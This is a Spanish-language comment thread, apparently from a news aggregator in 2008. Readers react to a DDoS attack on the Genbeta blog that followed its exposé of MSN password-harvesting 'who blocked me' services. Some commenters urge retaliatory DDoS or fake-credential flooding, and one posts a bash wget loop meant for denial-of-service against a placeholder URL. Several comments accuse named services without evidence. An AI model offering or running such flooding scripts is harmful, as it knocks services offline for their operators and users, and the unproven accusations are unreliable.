Perdonadme que haya tardado tanto, es que mientras me cargaba la página en caché (que no sé por qué ha tardado tanto) estaba viendo el 4x01 de Perdidos y se me ha ido el tiempo
Aquí está. Y ahora más que nunca: ¡Arriba, Genbeta!
http://ipurdidantza.blogspot.com/2008/02/no-pueden-tumbarnos-todos.html
A ver, a los que señalan a Blockoo como autor de este ataque... No los acuséis porque no hay ni siquiera ningún indicio de que son ellos. Además, sin dejar de tener dudas sobre su servicio web, fueron bastante correctos cuando me contestaron en el blog, y no creo que hayan tenido nada que ver.
Ya está, noticia de genbeta copiada verbatim en mi blog... referenciando autoría, claro.
Estoy haciendo una lista en mi blog (está en mi perfil y en los trackbacks de esta noticia) con todos los blogs que se han solidarizado, si falta alguno dejadme un comentario o trackback
Salu2!!
#2 Los considero suficientemente serios como para hacer eso, pero es solo mi opinión.
ya están saliendo apoyos a Genbeta:
http://quenotetimenmas.blogspot.com/
tumbarán a blogger?
Mis candidatos son blockoo.com, scanmessenger.com y checkmessenger.net por descarte. blockoo está caído y los otros dos puede decirse que son clones el uno del otro, con lo que quedan dos posibles sospechosos. El autor del ataque ha tenido las pocas luces de decir que vive en Ciudad del Este, que está en Paraguay. Eso lo he hecho en 5 minutos, por lo que creo que los de Weblogs SL ya saben quién ha sido.
Me sumo a la lista de trabajadores de Weblogs SL que confirman que el ataque es real. No es, ni mucho menos, una campaña de autobombo, como se ha dicho por ahi.
#3 pues si más gente se anima, por mi de maravilla
#33 Yo solo me fio de campofrio.
Aleh, un blog más en el que está puesto
Como dice #24... que tumben Blogger
#99 Eso pensé yo, ¡¡¡son unos Hombres De Paco!!!
#50 no se trata de quien tiene que demostrar que, el hecho es que los han amenazado y han cumplido con las amenazas, un ataque DDOS no creo que sea muy legal, vamos digo yo.
No me he leído muchos de los comentarios, pero el protocolo que usa WLM SÍ que te dice quien te ha bloqueado... Sólo que el cliente de Microsoft no incluye esa feature. Pero aMSN sí.
Este titulo es más flame:
http://xkod.com.pe/seguridad/quien-me-bloquea-en-msn-messenger-lista-de-servicios-basura/
Y acusa con dedo levantado a los servicios mencionados.
http://resistancefutile.com/2008/02/03/wtf-genbetero-extremo/
Esto es la repolla, el blog del coordinador de Genbeta esta caido, y me da que no ha sido precisamente por meneame...
Esos tios son mierda
¿Hay por algún lado alguna copia para ponerlo en mi blog? A ver si hay cojones de tumbar Blogger... (smiley de cabreo)
#24 ya hay algun que otro blog asi como este: http://quenotetimenmas.blogspot.com/
puedes copiarlo de ahi x'D
Ok, he publicado también la noticia en mi blog. Que les den!
http://quetzalnet.es/index.php?id=1613
Mmmm... y devolverles la papeleta?...
Voy a investigar un rato...
sigue sin ir... y yo con el "mono" que le tengo a visitar genbeta.
Otro blog más por aquí
Bueno, liquidado, yo me apunto a esto:
http://picallo.li/?p=667
http://picallo.info/2008/02/08/solidaridad-con-genbeta/
http://picallo.wordpress.com/2008/02/08/solidaridad-con-genbeta/
Por cierto, estoy intentando acceder a Blockoo.com y la web no funciona...
ME acabo de enterar de la noticia. Yo he recibido muchos mails de empresas de ese tipo, y la verdad, hoy dia quien no sabe que no tienes que poner tu contraseña en ningun sitio? Es como el jodido correo-cadena del virus ese que destruye el sector 0 del disco duro y que provoca que el universo implosione.
A veces me dan ganas de borrar mi cuenta de correo, que de pesaos son mis contactos, alguien me los cambia?
De donde cojones son estas mafias? qué HDP!
btw a estos si que habría que hacerles un google bombing:
"quien no me tiene en el messenger" -> "b*****o.com te roba las claves y hace phising"
se les termina el negocio, siempre y claro se tenga claro que son ellos eh ^_^
Yo me he quedado en el DOS, pero no hay forma de parar el DDOS? Aunque sea de forma temporal, rechazando todas las Ips que no sean de territorio español... es una putada para los que no son de España, pero es algo temporal. O si no, en los logs de acceso coger las IPs que entran habitualmente (de España o fuera) y permitirles el acceso a esas solas? Quizás sea una tontería lo que digo.
#69 Ya, ya, he hecho de todo, pero no sirve de nada, servidores en china, taiwan, polonia, rusia, etc..... incluso en alguna ocasión les he dejado un mensajito directamente en el escritorio (Terminal Server accesible).
Yo les tengo una propuesta, ¿por qué no llenamos la página del hdp responsable de miles de cuentas y contraseñas falsas?
#59 En eso tienes razón, está mañana me he encontrado con un pc de un cliente que pertenecía a una botnet, enviaba correos a saco, digo que pertenecía porque ya está capado.
Bueno parece que ya la gente se cree que esto no es una maniobra de autobombo. Ahora un par de temas que se han tratado aquí, no se puede filtrar tráfico. Si se filtra el tráfico ya sea a nivel de firewall o donde sea, se conseguirá que la aplicación no procese este tráfico, lo cual aliviará muchísimo la carga y si el problema es un DoS seguramente se solucione así. El problema es que si es un DDoS super tocho el firewall no dará abasto y caerá. Y ese es el problema actual es un ataque mu grandote.
Sobre lo de distribuir el artículo me parece una muy buena idea, sobre todo la gente que tiene sus blogs en blogger, estoy seguro de que no se van a meter con google. Y si no que lo hagan que así les vemos salir con el culo rojo.
Sobre lo de denunciar, claro que puede hacerse. El problema de todo es como demostrar la autoría de los hechos, estos ataques se realizan con botnets en el extranjera, manejadas a su vez desde otros sitios y seguramente conectados a ella atraves de anonimizadores, es muy difícil
En definitiva a ver como termina todo esto, porque lo de los DDoS es un problema, pero cada vez lo va a ir siendo más y más.
#59 ya, por eso digo lo de filtrar las IPs para que por lo menos los asiduos puedan acceder, aunque no sé la viabilidad de este método, quizás sea peor el remedio que la enfermedad ;D
el caso que hoy alguien de weblogssl me pregunto como parar el DDoS. Pero meterse con los de msn, con la de pasta que tienen y medios, pasa esto....
Yo también puedo asegurar que la noticia no es mentira, hay bastante gente trabajando en solucionarlo, no veo los beneficios de un autobombo así genbeta ahora mismo esta caida y eso no es bueno se mire como se mire.
un ddos de echo creo que es denunciable (aunque es muy dificil de demostrar) supongo que si van a juicio el juez podría pedir la revisión de los correos del sitio denunciado (bueno, ultimamente veo mucho Shark asi que..
)
y btw ya son lentos para parar el ataque con un tcpdump y unas mad skillz de iptables se soluciona en linux (vamos, que al final son siempre los mismos paquetes una y otra vez desde distintos sitios) y si usan freebsd con dummynet hasta podría ser divertido.
Yo también pertenezco a la red de Weblogs S.L. y afirmo, para quien no lo crea, que el ataque es real, tras una amenaza a la que hemos prestado poco caso, y es que a veces nos vienen algunos correos bastante curiosos.
#33 Ese es el problema, que es de fé, no tienen ni una garantía de que no pasa lo que se comenta en el artículo. Y por lo que se ha podido comprobar, la mayoría de los que ofertan ese servicio tienen unas prácticas dudosas para defenderse...
Que contraten los servicios de Prolexic. A los de la cienciología CASI les sirve de algo
Hmm...
Sé que no es muy cívico que digamos, pero, ¿qué tal y si les devuelven el detalle de la misma manera con que quieren hacer callar a genbeta?
Existen servicios para realizar stress-test a los servers, solo es de poner el link de imágenes de la página en cuenstión y luego ya saben.
Me pregunto si no se les puede contestar para que ya dejen de molestar por decir una verdad como un templo.
#34, Gracias por el apunte ahora mismo ya se a quien achacar ciertos spams que he recibido últimamente y voy a denunciarlo a los responsables de la red que me lo envió. (La verdad es que no lo había pensado )
Creo que Blockoo la ha cagado pero bien con esto...
DDOS VS BBLOGS
Estaría bien que el tema alcanzase repercusión internacional, si algunos tenéis contactos con blogs internacionales, ya sabéis
blockoo.com está petá
No os coleis........
#74 Entonces te toca tragar al igual que a mí, la idea es que si reciben 1000 reportes de la misma IP se planteen tomar medidas. Es lo que tiene vivir en un mundo lleno de lusers en el que cualquiera tiene acceso a un ordenador sin saber las consecuencias de lo que está haciendo
Por suerte o por desgracia hay cientos de blogs que copian todos los artículos de Genbeta (buen backup)
Mirror: http://www.foromsn.com/index.php?Ver=Mensaje&Id=289432
Luego publiqué otra noticia para cerrar con este tema:
Mirror: http://www.bigblueball.com/forums/noticias-en-mi/41557-como-funcionan-los-servicios-que-te-dicen-quien-te-ha-bloqueado-en-el-msn.html
La verdad es que tiene narices... Conozco varias personas que cayeron, incluso gente que se supone que trabajan con ordenadores... Pero supongo que la curiosidad mató al gato.
Pero bueno, como siempre pasa con estas cosas al final tienen el efecto contrario. A saber la cantidad de blogs que se hacen eco de esto ahora.
Saludos !
Yo si quereis hago una traducción para digg de toda la movida...
#82 a que esperas?
Genbeta es uno de los pocos blogs que mantengo en mi lista de suscripciones desde hace varios años. Siempre es útil e interesante.
#50 Creo que te equivocas, LOS QUE TIENEN QUE DEMOSTRARLO SON LOS QUE PIDEN CONTRASEÑAS, OK? Es que mas claro agua.
Y lo que es peor es la reaccion de juanquer de los energumenos...
Para los incrédulos que piensan que es autobombo... que prueben a entrar ahora (1.20 de la madrugada) que verán cómo el servidor está 100% caido, aunque afortunadamente parece que nuestro técnico lo ha arreglado en parte y sólo afecta al servidor de genbeta, no a los demás. Hemos estado unos cuantos días con caidas cada pocos minutos, y en toda la red.
Ya decia yo que no habia manera que entrase
la misma en la cache de google (para quien le interese):
http://www.google.com/search?q=cache:dWtizocDgtoJ:resistancefutile.com/2008/02/03/wtf-genbetero-extremo/
#3 Esto es lo que hay:
http://www.google.es/search?hl=es&q=messenger+site%3Ahttp%3A%2F%2Fwww.genbeta.com%2F2007%2F11%2F13
Se podría traer a portada este hilo que quedo en el camino y viene muy al caso: 24 servicios que pueden robar tu contraseña de Hotmail y lista de contactos
24 servicios que pueden robar tu contraseña de Hot...
spamloco.netYo también los apoyo, ¡ahora verán el poder de la blogósfera!: http://actualidadsiliconvalley.blogspot.com/2008/02/atacan-genbeta-por-no-retirar-una-de.html
Como mola eso de... ¡El poder de internet!
pero perfecto, a eso es a lo que me referia!!!! Cuando tenga mi articulo te paso el link.
Unámonos todos y publiquemos-lo en nuestros respectivos blogs. Se van a CAGAR.
Creo que no estaría mal recopilar una lista de todos los blogs que se sumen a la cruzada. Aunque sea un poco de autobombo, todos los que lo hagan que publiquen el link al artículo en los comentarios. Yo por mi parte voy a hablarlo en mi blog.
Porque la poquísima credibilidad que le quedaba a esos de Blockoo (Porque es evidente que son ellos) se ha esfumado cuando han actuado de esa forma tan rastrera. Si al menos hubieran demostrado lo que dicen...
Es más, podríamos hacer lo que ellos en su propia web. Un ataque DDOS.
Como era esa horterada de "El pueblo unido..." pues ahí queda eso.
Edit: #44 te me has adelantado
Contactos con blogs internacionales? Que alguien lo meta en digg
ES LA GUERRA!! MAS MADERA!!
tambien la gente podria poner el link este por ejemplo en el nick dl messenger http://quenotetimenmas.blogspot.com/ .... la mayoria de gente que cae en estas cosas no visita meneame ni la blogosfera
#85 ya vuelve a estar operativo.
Tiene narices que se dediquen a enmierdarse de esta forma, por algo que conocen todos los usuarios que llevan un tiempo por ahí. Incautos siempre los hay, pero cuando te la cuelan en una ocasión.... no te la vuelven a colar.
Una pregunta q me hago es, ¿para que quiero saber quien me tiene bloqueado?
gracias #1
#44 Aqui teneis otro:
http://www.neutronica.es/2008/02/genbeta-hackeada/
Ya he posteado tb en mi blog, la verdad es que a mi me tocan las narices estas paginas pero esto del ataque ya se pasa de la raya...
Bueno, pues yo también me uno a la causa
Por cierto, si os aburrís mucho os dejo un pequeño script en bash para lanzar ataques DOS (con fines educativos sólo, el uso que hagáis de él no es cosa mía). Pero os recuerdo que los ataques DOS son ilegales en españa.
WAITMAX=10; WEB="http://responsable.ext"; PETS=0; while(true) do wget -q -O /dev/null "$WEB"; PETS=`expr "$PETS" + 1`;clear; echo "Enhorabuena, ya has realizado $PETS peticiones ;)"; sleep `expr $RANDOM % ( "$WAITMAX" + 1 )`; done;
No, elecTron, te equivocas tú. Es obvio que el que acusa es el que tiene que demostrar la acusación.
No soy ningún experto en seguridad, pero puede ser que los que están atacando a genbeta sean los propios usuarios de algún tipo de programa para el MSN Messenger (A modo de anfitriones del malware).
para no dar lugar a especuladiones que posteen los logs de los ataques
esa gentuza en mi clan se les llama "lammers"
bueno pero alguien ha probado el bloko y si hace eso q dice ?
Vaya por delante que nunca he usado estas páginas y que está claro que no funcionan porque no hay forma de saber quién no te admite (esto lo digo por la que me va a caer). Lo de que guarden y utilicen las cuentas de la gente, si se dice, hay que demostrarlo. Por supuesto que sí.
Mucha tontería con copiar el artículo de un sitio a otro, total, copiar y pegar no da trabajo. ¿Alguien se ha molestado en verificar la versión de unos y otros?
Siempre estamos igual: uno grita "INJUSTICIA" y todos los defensores de la libertad se suben al carro de la diatriba sin pensárselo dos veces.
En serio, de Blockoo me fio. Y no lo he usado. Pero el tio que lo lleva si lo lleva es por que eso tiene montones de visitas y da dinero; y no por que quiera sacar la contraseña. Doy fé.
y quiénes se supone que son los autores del ataque? no será un autobombo por parte de weblogs? (desconfiado)
Lo de resistancefutile en el fondo les esta bien empleado, por ir de listos con la tonteria de los hoygan (que a mi no me parece tan hoygan)